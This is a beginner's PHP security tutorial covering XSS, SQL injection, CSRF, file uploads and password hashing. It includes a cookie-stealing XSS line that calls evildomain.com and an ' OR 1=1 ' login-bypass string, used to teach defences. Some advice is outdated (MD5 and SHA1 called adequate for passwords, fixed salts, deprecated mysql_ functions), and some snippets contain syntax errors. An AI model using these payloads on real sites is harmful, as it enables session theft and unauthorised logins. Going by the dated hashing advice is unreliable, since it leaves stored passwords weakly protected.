php security – XSS XSS SQL Injection Spoofed Form Input CSRF File Upload Including Files eval() Register Globals Magic Quotes

Introduction
Different Types of Attack
XSS
SQL Injection
Spoofed Form Input
CSRF
File Uploads
Including Files
eval()
Register Globals
Magic Quotes
Error Reporting
PHP 5
Plain Text Passwords
Taking it further: Salting
Conclusion
Enjoy this guide/find it useful? Please consider donating!

Introduction

Since PHP is a very high-level scripting language, some of the potential security flaws that many languages present are totally irrelevant to it: you don’t have to manage your memory, for example, and thus don’t have to worry about things like buffer overflows. Being a high-level language also means that PHP is much easier to learn; however, this is possibly the biggest problem with the language as a whole. Many people learn PHP as a first language and don’t consider some of the fundamental considerations one must make when writing programs, particularly ones as public as are most web applications.

This guide aims to familiarise you with some of the basic concepts of online security and teach you how to write more secure PHP scripts. It’s aimed squarely at beginners, but I hope that it still has something to offer more advanced users. Enjoy.

Different Types of Attack

XSS

XSS stands for “Cross Site Scripting”, and refers to the act of inserting content, such as Javascript, into a page. Usually these attacks are used to steal cookies which often contain sensitive data such as login information.

An example of a script vulnerable to XSS is this simple script to fetch a news item based on its ID:

[php]
$id = $_GET[‘id’];
[/php]

echo ‘Displaying news item number ‘.$id;

/* snip */
Now, if $_GET[‘id’] contains a number, then all’s well and good—but what happens if it contains this?

[php]
<script>
window.location.href = "http://evildomain.com/cookie-stealer.php?c=" + document.cookie;
[/php]

If a user passed this simple Javascript into the $_GET[‘id’] variable and convinced a user to click it, then the script would be executed and pass the user’s cookie data onto the attacker, allowing them to log in as the user. It’s really that simple.

Firstly, you must never implicitly trust user input. Always presume that every bit of input contains an attack, and code to account for that. To do this, you need to filter user input, removing it of HTML tags so that no Javascript can be run. The easiest way to do this is with PHP’s built in strip_tags() function, which will remove HTML from a string rendering it harmless. If you just want to make the HTML safe without removing it altogether, then you need to run the input through htmlentities(), which will convert < and > to < and > respectively.

SQL Injection

Many sites use databases as a backend to store their data, using queries to insert and select data from it. However, many people are unaware that such sites are often vulnerable to a form of attack called SQL injection.

SQL injection is when malformed user input is used directly and deliberately in an SQL query, in a way that allows the attacker to manipulate the query. This means that an attacker could delete portions of your database, make himself an admin account etc—the possibilities are endless.

One of the most common vulnerabilities is when logging in to a site. Take this example:

[php]
$username = $_POST[‘username’];
$password = $_POST[‘password’];

$result = mysql_query("
SELECT *
FROM
site_users
WHERE
username = ‘$username’
AND
password = ‘$password’
");

if ( mysql_num_rows($result) > 0 )
// logged in

[/php]

This is vulnerably to a pretty obvious SQL injection; can you work out how an attacker could modify the query to allow himself to be logged in regardless of whether or not he has the right password?

If the attacker enters a valid username in the username field—”rob”, say—and the following in the password field:

[php]
‘ OR 1=1 ‘
[/php]

The resulting query will look like this:

[php]
SELECT *
FROM
site_users
WHERE
username = ‘rob’
AND
password = ” OR 1=1
[/php]

It will therefore select all users where:

the username is “rob”
either the “password” field is empty, or 1 is equal to 1
Since the last criteria will always be true—when is 1 ever not equal to 1?—the user will be able to log in as rob without knowing rob’s password. Eek!

As with XSS attacks, you must never trust user input. The best way of cleaning user input is using PHP’s built in mysql_real_escape_string() function; this will escape characters such as ‘, ” and others, making them useless in “breaking out” of a quoted string as in the above example. If you’re using a number in your query, then you should use intval() on the inputted number to ensure it is numeric.

Spoofed Form Input

As an extension of the above two points, it’s important to remember that input sent to your script may not have been sent from the form you created. This means that, although you might have data in checkboxes, radio buttons, selects or other “read-only” elements, they might contain values that were never in the elements you created and thus need filtering just like inputs and textareas.

This also means that you cannot rely soley on client-side validation. Whilst it’s nice to have errors pointed out to the user without having to reload a page (and possibly lose all of their input), using client-side validation as a security measure is not sensible. Make sure you check all input server-side, in your PHP scripts, before you do anything like insert it into a database.

See the CSRF section below for more details on how to avoid spoofed form input.

CSRF

CSRF stands for “Cross-Site Request Forgery”, and CSRF attacks are similar in scope and methodology to XSS attacks. CSRF attacks usually either exploit the fact that many websites perform actions on HTTP GET requests—deleting blog posts, buying items etc.—or spoof a client request to a resource so that the website believes the request is genuine. Either way, the victim performs an action on a website that trusts him—usually his own—that he did not intend to happen.

First, we’ll begin with an example attack, then we’ll look at some ways of defending against such attacks.

Many websites allow you to perform actions at the click of a link, such as deleting a forum post. Usually, the URLs that perform these sorts of actions look a little like this:

http://example.com/forum/deletepost.php?id=392

deletepost.php will typically check that the user performing the request is logged in, and if so perform the requested action—in this case, deleting the post with the id of 392. However, this method of authentication leaves open a massive security flaw; what if a privileged user—a forum moderator, for example—were to be tricked or forced into visiting this URL? The post would be deleted, but that’s not what the moderator wanted. An attacker could even go further—if the URL were entered in an HTML tag, for example, the privileged user would likely not even know that they had performed the action.

How, then, can we avoid such attacks? There are two methods that, when used together, completely eliminate the possibility of CSRF attacks.

The first is rather simple: never, ever use GET for any critical task. Instead, use a POST form. Such requests are harder to forge and have the added bonus that they are impossible to load into HTML image/script tags, eliminating an attacker’s ability to exploit your site remotely.

The second is to make sure all requests originate from your own forms, eliminating the possibility that the request could have been loaded from a fake form on a different webpage. To do this, we can create a value— known by some as a “nonce”, but here referred to as a “token”—that is created especially for the form, submitted along with it, and checked— along with the usual permission checks—before the action is performed.

Here’s an example that creates and checks a token before deleting a forum post:

[php]
<?php

session_start();

if( !empty($_POST[‘post_id’] ) {
if( !user->is_a_moderator )
die;
if( empty($_POST[‘token’]) || $_POST[‘token’] != $_SESSION[‘token’] )
die;

// All fine: delete the post.
delete_post( intval($_POST[‘post_id’]) );

// Unset the token, so that it cannot be used again.
unset($_SESSION[‘token’]);
}

$token = md5(uniqid(rand(), true));
$_SESSION[‘token’] = $token;

?>
[/php]

 

[php]
<form method="post">

<p>Post ID to delete:</p>
<p><input type="text" name="post_id" /></p>

<input type="hidden" name="token" value="<?php echo $token; ?>" />

</form>

[/php]

As we can see, using a POST form with a generated token is simple, straightforward and eliminates the possibility of CSRF attacks.

File Uploads

File uploads are potentially the biggest security risk in web development. Allowing a third-party to place files on your server could allow them to delete your files, empty your database, gain user details and much more.

However, it’s certainly possible to upload files safely, and such functionality can be a great feature of your site.

When allowing users to upload files from their local machine to your server, there are two things that you need to check. The first is the mime-type of the uploaded file; if your script is uploading images, for example, you’ll want to just accept image/png, image/jpeg, image/gif, image/x-png and image/p-jpeg. You can do so as follows:

[php]
$validMimes = array(
‘image/png’,
‘image/x-png’,
‘image/gif’,
‘image/jpeg’,
‘image/pjpeg’
);

$image = $_FILES[‘image’];

if(!in_array($image[‘type’], $validMimes)) {
die(‘Sorry, but the file type you tried to upload is invalid; only images are allowed.’);
}
[/php]

// Do something with the uploaded file.
The second thing to check is the file extension. It’s certainly possible to spoof a mime-type; one vector is to take an image, insert PHP code into the sections the file format allows for meta data, give it a .php extension, and upload it. In this case, your mime-checking would think the file was an image, upload it, and allow execution of the PHP code within.

To avoid this, you should manually assign files an extension based on their mime-type. We could extend our above example to take this into account:

[php]
$validMimes = array(
‘image/png’ => ‘.png’,
‘image/x-png’ => ‘.png’,
‘image/gif’ => ‘.gif’,
‘image/jpeg’ => ‘.jpg’,
‘image/pjpeg’ => ‘.jpg’
);

$image = $_FILES[‘image’];

if(!array_key_exists($image[‘type’], $validMimes)) {
die(‘Sorry, but the file type you tried to upload is invalid; only images are allowed.’);
}

// Get the filename minus the file extension:
$filename = substr($image[‘name’], 0, strrpos($image[‘name’], ‘.’));

// Append the appropriate extension
$filename .= $validMimes[$image[‘type’]];
[/php]

// Do something with the uploaded file
You can see how the above attack is avoided; if the image containing the PHP code was called foo.php and was a PNG, it would would be renamed to foo.png and the code would not be executed.

Including Files

Never, ever include files based on user input without thoroughly checking said input first. One of the major culprits of this is the ubiquitous index.php?page=something.php script that so many people love to use:

[php]
include $_GET[‘page’];
[/php]

By doing so, you can make maintenance of your site much easier; you can keep content in individual files, and make changes to areas such as the navigation in just one file and have them appear globally—much like frames, but without the client-side disadvantages they bring. However, there is a problem with this method; it allows the user to specify whatever file they like, giving them access to the contents of any file on the server that your PHP script has permission to open. Even worse, if the PHP directive allow_url_fopen is turned on, an attacker can open files from another server—and execute any PHP code within them, since the script uses include and not something like echo file_get_contents(). This gives them complete control of your webserver and the files on it. As you can see, this is very bad.

You can prevent this in one of two ways. If you only have a few pages, you can make a white-list of pages that are allowed, like so:

[php]
switch($_GET[‘page’]) {
case "about":
include(‘about.php’);
break;
case "news":
include(‘news.php’);
break;
default:
include(‘home.php’);
break;
}
[/php]

This method means that only the pages you explicitly and specifically allow can be included into the page, removing any possibility of an attack. However, it’s rather cumbersome—every time you add a new page, you have to edit this file and add it to the whitelist.

So, a better method would be to simply clean the input to make sure that it’s safe. This strikes a balance between the ease-of-use of the first method and the security of the second.

[php]
$page = preg_replace(‘/\W/si’, ”, $_GET[‘page’]);
[/php]

include(‘./’.$page.’.php’);
In this particular script, we take two steps to make sure that the file is valid. The first, scary-looking line is a regular expression, which removes all non-word characters—that is, non alpha-numeric ones—from the input. This means that an attacker cannot traverse directories using .., or input a URL—http://www.google.com, for example, would be filtered to httpwwwgooglecom: useless, but safe.

Another related point is the naming of included files. Many scripts store their settings in external files to make it easy for end-users to change them. If you’re working on a script that does this, be sure to name your included files with an extension that isn’t displayed as plain text. Many scripts use .inc, which by default is displayed as a regular text file in most web servers. This could give users access to sensitive information such as database details and user info. The best option is to name the files with an extension of PHP; that way, if a user requests the files, they’ll simply be greeted with a blank page.

If you’re using Apache, and using a script that insists on using INC files, then you can use this setting to disallow direct access to .inc files:

[php]
<files ~ "\.inc$">
Order allow,deny
Deny from all
</files>
[/php]

This should be placed in a file called .htaccess, in your top-level directory. It basically disallows end-users from viewing .inc files, but still allows scripts to include and use them.

eval()

eval() is a useful but very dangerous function that allows you to execute a string as PHP code. There aren’t many occasions where this is neccessary, and being realistic you should avoid its usage, especially if you want to use user input in the string.

Register Globals

register_globals is a PHP setting that automatically takes data from the superglobal arrays ($_GET, $_POST, $_SERVER, $_COOKIE, $_REQUEST and $_FILE) and assigns them to global variables; $_POST[‘message’] would automatically be assigned to $message, for example. This setting is automatically disabled with new installations of PHP, and with good reason. Take this example:

[php]
if($_POST[‘username’] == ‘rob’ && $_POST[‘password’] == ‘foo’) {
$authenticated = true;
}

if($authenticated) {
// do some admin thing
}
[/php]

Now, with register_globals turned off, this script works as intended; $authenticated is only set if the user has entered the correct password. However, with register_globals turned on, a malicious user could run the script as

script.php?authenticated=true

and he would automatically be granted admin rights.

There’s not a whole lot you can do about this setting if you’re using shared hosting, but you can code your scripts so that they aren’t affected by any malicious exploitation of register_globals. The above example, for instance, would become:

[php]
$authenticated = false;

if($_POST[‘username’] == ‘rob’ && $_POST[‘password’] == ‘foo’) {
$authenticated = true;
}

if($authenticated) {
// do some admin thing
}
[/php]

By explicitly setting $authenticated to false, we avoid any potential overrides through register_globals.

Magic Quotes

Magic Quotes were an attempt by the PHP developers to add some default security into PHP; when the magic_quotes_gpc setting is turned on, all ‘ (single quote), ” (double quote), \ (backslash) and NULL characters are escaped with a backslash automatically. Note that this is NOT the same as mysql_real_escape_string(), and by turning it on you do NOT prevent all SQL injection attacks. This is the first problem.

The second is that that they pose a portability nightmare. Some hosts have the setting on, and others don’t; if you’re writing a script that’s going to be used on multiple systems, you need to check whether magic quotes is turned on and act appropriately.

However, there are solutions to this. One method is to check if the setting is turned on and, if it isn’t, add magic quotes yourself:

[php]
function add_magic_quotes($array) {
foreach ($array as $k => $v) {
if (is_array($v)) {
$array[$k] = add_magic_quotes($v);
} else {
$array[$k] = addslashes($v);
}
}
return $array;
}
if (!get_magic_quotes_gpc()) {
$_GET = add_magic_quotes($_GET);
$_POST = add_magic_quotes($_POST);
$_COOKIE = add_magic_quotes($_COOKIE);
}

[/php]

Alternatively, you can do the opposite, and remove the slashes if magic quotes are turned on:

[php]
function remove_magic_quotes($array) {
foreach ($array as $k => $v) {
if (is_array($v)) {
$array[$k] = remove_magic_quotes($v);
} else {
$array[$k] = stripslashes($v);
}
}
return $array;
}
if (get_magic_quotes_gpc()) {
$_GET = remove_magic_quotes($_GET);
$_POST = remove_magic_quotes($_POST);
$_COOKIE = remove_magic_quotes($_COOKIE);
}
[/php]

Include either of these methods at the top of your main include, and rest easy.

Error Reporting

If you have error reporting turned on fully, important information can be displayed in the event of an error—even a relatively minor one. PHP provides a function called error_reporting() that allows you to change the level of error reporting on a per-script basis.

Whilst in development, you should take advantage of this function to display all errors, warnings and notices, like so:

error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
This helps to avoid any errors appearing on production sites that you’d missed in development, and helps you produce better code—especially since notices are usually about flaws in style.

However, when you put your site into production, this level of detail can be dangerous. You can’t forsee all errors during development—your program could run out of memory or diskspace, for example. So, for safety’s sake, on production sites you should disable the displaying of errors and instead log them to a file safely outside of your directory root; this way, the public can’t see if anything goes wrong, but you can. Here’s a simple bit of code that will accomplish this:

[php]
error_reporting(E_ALL^E_NOTICE); // This is a ‘sensible’ reporting level
ini_set(‘display_errors’, 0); // Hide all error messages from the public
ini_set(‘log_errors’, 1);
ini_set(‘error_log’, ‘path/to_your/log.txt’); // Preferably a location outside of your web root
[/php]

Be sure to edit the path to the error log so that it’s a correct path and one that is writeable by the server process—and check regularly for errors.

PHP also offers a function, set_error_handler(), that allows you to write your own error handling function that is called when an error occurs. This way, you could implement a much more sophisticated system, perhaps displaying errors to admins or giving a “nice” message to users when the site is down, rather than a confusing PHP-generated error or even a blank page.

Another important thing that people sometimes miss is mySQL error reporting. A useful tip for development is to print error reports when a query fails so you can see what went wrong, like so:

[php]
mysql_query(‘
SELECT *
FROM table_that_doesnt_exist
‘) or die(mysql_error());
[/php]

During development, this is great—it allows you to see quickly that the table doesn’t exist, and that’s why it’s breaking. However, you should never leave this on in a production environment; if there happens to be an error, you should log the error appropriately and give a generic error message to the user if it’s critical. If you don’t, an attacker can find out important information about your database schema and even some login information.

PHP 5

PHP 5 offers error reporting that is worlds away from the simple system in PHP 4. One of the most important additions is the ability to throw and catch exceptions, a feature that many languages have offered for years but PHP has only just picked up.

When a function encounters an exceptional circumstance it can raise—or throw—an exception. The code executing that function can then try the function, catch any exceptions that occur and act accordingly. If the exception is not caught, your script will display a fatal error and halt execution.

Here’s some example code that should make things a bit clearer for you:

[php]
function getData($filename) {

if(!file_exists($filename)) {
throw new Exception(‘File does not exist’);
}

if(filesize($filename) == 0) {
throw new Exception(‘File is empty’);
}

// If any of the above exceptions are thrown,
// this code will not be executed:
return file_get_contents($filename);

}

try {
getData(‘file.txt’);
}
catch(Exception $e) {
echo ‘There was an error opening the file: ‘.$e->getMessage();
}

[/php]

You may also extend the exception class: the PHP manual has some great information on the subject.

As you can see, exceptions are a great way of avoiding the display of nasty PHP errors and maintaing the integrity of your code, especially when you do a little more with the catch section than simply display a message. You can keep your code running even if a severe error occurs, and by extending Exception you can make the source of errors clear to other developers.

However, exceptions are quite performance intensive and not always useful to the end user; use them sparingly and know when to use default error handling instead.

Plain Text Passwords

When storing passwords, it’s important never to store them in plain text. The reasoning behind this is that, if an attacker were ever to gain access to your database or to a user’s cookies, they would know the user’s password which they could potentially use on many other sites—as well as the fact that they would be able to log in as that user on your site.

How, then, can you hide the user’s actual password whilst also retaining the ability to check if a user’s password is correct when logging in? The answer is something called “hashing”. This way, you store a hash of the user’s password in the database, and hash the input when logging a user in; if the hashes match, the input is correct. This way, you never have to store the user’s actual password.

There are two main methods of hashing: MD5 and SHA1. PHP offers functions for both; SHA1 is generally regarded as stronger by professional cryptologists, but both are perfectly adequate for most people’s needs.

Here’s a quick example of a safe way to do things:

[php]
$user_name = mysql_real_escape_string($_POST[‘username’]);
$user_password = md5($_POST[‘password’]);

$result = mysql_query(‘
SELECT COUNT(*) AS count
FROM users
WHERE user_name = "’.$user_name.’"
AND user_password = "’.$user_password.’"
‘);

$row = mysql_fetch_assoc($result);

if($row[‘count’] > 0) {
// Password is okay.
}

[/php]

Also worth noting is that there’s no need to escape the MD5d password before inserting it into the database, since MD5 hashes are always alphanumeric.

Taking it further: Salting

Salting refers to the concept of adding an extra piece of information to the data we’re hashing before we hash it. This means that even if a user were to have a list of every known MD5/SHA1 hash (which is an absolute impossibility, naturally), plus the user’s password hash, they’d still not be able to derive the password from the hash by comparison unless they also knew the salt data, making dictionary attacks useless.

This is perhaps better explained with an example.

Let’s say a particularly unimaginitive user chooses for their password the word “password”. If we don’t implement salting, the password is stored in the database as 5f4dcc3b5aa765d61d8327deb882cf99, the plain MD5 value of “password”.

If a hacker gains access to the password hash of a user, either from their cookie or from the database itself, they could then scan through a “dictionary” of words, hashing each one with MD5, until they found a hash that matched the user’s—they would then know that that particular word was the user’s password.

By introducing salting, however, we’d end up hashing the salt as well as the password, and storing that in the database. Given a relatively strong salt of “f963kjg”, our hash would become b9be01b2cf3d77fe60f6e8892d664606, and the attacker would never be able to gain access to the user’s password—not unless they had the string “f963kjgpassword” in their dictionary, anyway.

So, to use a salted hash, we simply hash the salt and the password together:

[php]
$salt = ‘thequickbrownfox’;
$password ‘foobar123’;

$salted_hash = md5($salt . $password);
And do the same when checking the password:

$salt = ‘thequickbrownfox’;

$user_name = mysql_real_escape_string($_POST[‘username’]);
$user_password = md5($salt . $_POST[‘password’]);

$result = mysql_query(‘
SELECT COUNT(*) AS count
FROM users
WHERE user_name = "’.$user_name.’"
AND user_password = "’.$user_password.’"
‘);

$row = mysql_fetch_assoc($result);

if($row[‘count’] > 0) {
// Password is okay.
}
[/php]

Considering how simple a change salting is compared with the security benefits it brings, it’s certainly worth doing.

Conclusion

Hopefully this has made you a little more aware of the dangers that can face you when writing PHP scripts, and hopefully you’ve understood what I’ve tried to say. Remember: always presume that input is malformed, act accordingly, and you’ll be fine.